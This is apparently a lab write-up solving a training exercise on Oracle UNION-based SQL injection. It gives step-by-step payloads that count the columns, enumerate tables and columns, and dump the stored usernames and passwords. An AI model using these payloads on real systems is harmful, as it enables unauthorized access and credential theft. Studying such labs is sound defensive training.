Difficulty : Practitioner
🎯 Goal
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
✅ Solution
Find the number of columns:
1
2
3
<website>/filter?category=Gifts'UNION SELECT NULL FROM DUAL-- # error!
<website>/filter?category=Gifts'UNION SELECT NULL,NULL FROM DUAL-- # works
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL FROM DUAL-- # error!
We know 2 columns are returned by the query. Is one containing string?
1
2
<website>/filter?category=Gifts'UNION SELECT 'abc',NULL FROM DUAL-- # works
<website>/filter?category=Gifts'UNION SELECT 'abc','abc' FROM DUAL-- # works
We don’t know the name of the table storing the credentials. We have to list all the tables:
1
<website>/filter?category=Gifts'UNION SELECT table_name,NULL FROM all_tables--
75 table names are displayed. A quick sort make USERS_OPLMGY stands out. Time to find the column names inside.
I didn’t find it first try! I had to look on internet and I found that I have to query the table
USER_TAB_COLUMNS.
1
<website>/filter?category=Gifts'UNION SELECT column_name,NULL FROM USER_TAB_COLUMNS WHERE table_name='USERS_OPLMGY'--
We obtain USERNAME_JIHLXR and PASSWORD_DNJXFC.
1
<website>/filter?category=Gifts'UNION SELECT USERNAME_JIHLXR,PASSWORD_DNJXFC FROM USERS_OPLMGY--
That’s how I solved this challenge!